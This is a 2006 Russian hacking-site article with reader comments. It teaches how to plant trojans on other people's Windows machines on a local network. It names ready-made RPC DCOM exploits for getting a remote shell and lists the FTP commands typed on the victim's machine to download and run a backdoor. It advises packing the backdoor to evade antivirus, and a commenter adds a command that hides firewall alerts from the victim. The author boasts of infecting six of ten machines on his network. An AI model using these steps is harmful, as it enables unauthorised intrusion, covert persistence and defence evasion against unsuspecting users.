Контакты

Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobalt[@]gfs-team.ru

Все материалы предоставлены только с ознакомительной целью
ГлавнаяСтатьиХакингЛомаем локалку
© Ak_mind 04.01.2006 статья не оптимизирована


Взлом своей локалки! Как много в этом словосочетании! Все мы когда-то начинали
свою карьеру на поприще хакинга именно с этого. Став "большими дядями" мы
почему-то начинаем чураться таких видов взлома, а ведь все начинается с малого!
Дорога к вершинам хакерской лестницы лежит именно со взлома локальных сетей. Я
надеюсь что эта маленькая статья поможет тебе шагнуть на самую первую ее
ступеньку. В ней я расскажу тебе как протроянить чужую машину под управлением
ОС WINDOWS.

Для того чтобы залить бэкдоор на тачку с Виндой нам понадобиться:
Kaht, Kaht2 - эксплоиты дающие шелл(доступ к cmd) на удаленной машине так же
как и Rpc, Rpc2 Rpc3, LCC.

Я бы посоветовал иметь все выше перечисленные программы, так как эти сплоты не
новые и работают процентов на 40 (представьте себе даже с таким процентом и
количеством выпущенных заплаток я смог протроянить 6 из 10 (!) компов в своей
локальной сети)

Еще нам понадобиться  FTP сервер, для того чтобы мы могли закачивать Трояны на
жертву. Самый лучший по моему мнению ServerU. Он легок в настройке. И довольно
прост в применении.

Кроме того, нам нужен  какой-нибуть бэкдор. Можно попробовать AntiLAmer BakDorr
или LamerDeath. Их множество, но что самое ужасное они все паляться
антивирусами. Можно конечно постараться сжать его при помощи FSG процент
непропалиться подскочит, но не на много.

Теперь, когда у нас все есть, приступим к активным действиям.

1.Узнаем  ip
Нам либо сразу известен он, либо мы Знаем DNS-имя если DNS тогда вводим в
командной строке
$ping <имя >
И дальше высматриваем там IP.

2.Атакуем
Запускаем один из эксплоитов, большинство запускаются в режиме Мс-ДОС.
Если атака прошла успешно, и перед нами появилась командная строка, переходим к
следующему пункту, если нет, то пробуем другой эксплоит.

Теперь нам надо закрепиться в системе на долгое время, чтобы у пользователя на
всю жизнь остались воспоминания о тех прекрасных днях когда у него стаял твой
бэкдор =).

3.Заливаем Трояна или бэкдоор.
Устанавливаем и запускаем фтп сервер. В некоторых версия RPC FTP встроен, но я
ему не доверяю.
В командной строке на удаленном компе вводим:

$Ftp
$open 
Далее в зависимости от настроек твоего FTP вводишь имя пользователя, и пароль
которые ты установил.
$dir - смотришь файлы которые ты открыл для скачки.
$get <имя вируса>- закачка
$quit - выходим из соединения с FTP.
$<имя того, что закачал>- запуск на удаленном компе

ВСЕ если у него нет Антивируса и файра то все будет работать
К сожалению сплоиты не новые поэтому работать будут не всегда, более новые можно
найти на Securitylab.ru но преимущество тех что я перечислил Они
откомпилированы.
Если найдешь более новый откомпиленный сплоит то стучи 192232206 =)



© Ak_mind 04.01.2006 статья не оптимизирована

e-Commerce Partners Network
Outlaw написал:

Привет, это хотел бы добавить если при взлома тачки ты получил контроль к cmd, и все же на тачке есть фаер волл, конечно без палево ты не сможешь открыть соеденение с FTP сервером, для того что бы пользователь не увидел сообщение фаерволла о том что данный сервис хочет сделать, примени эту команду на машине жертвы:

netsh firewall set notifications ENABLE

Данная команда отключает вывод сообщений фаерволла и пользователь не о чем не узнает.

Invisible написал:

Я вот объясните пож. Как атаковать? Сначало сплоит нужно впарить? потом запустиь . Так?

Ak-mind написал:

Нет в том то и суть что ничего впаривать не надо, при помощи сплоита RPC_DCOM ты уже можешь получить доступ к удаленной коммандной строке. Но учитывая давность всего этого, это уже не актуально, пора ребят новые дыры искать...

Ник:

Текст:
P Br B I Qute



Код: обновить
Последние комментарии
24.09.2017 06:18:34 Avito777jaf написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Мое...
Новый релиз
24.09.2017 05:54:07 Avito777jaf написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Приветствую...
Новая статья
24.09.2017 04:52:32 Avito777jaf написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Здравствуйте,...
Релиз
Реклама

Тут должна была быть ваша реклама, но мы потеряли глиняную табличку с ее текстом. SapeId: 665044

Rambler's Top100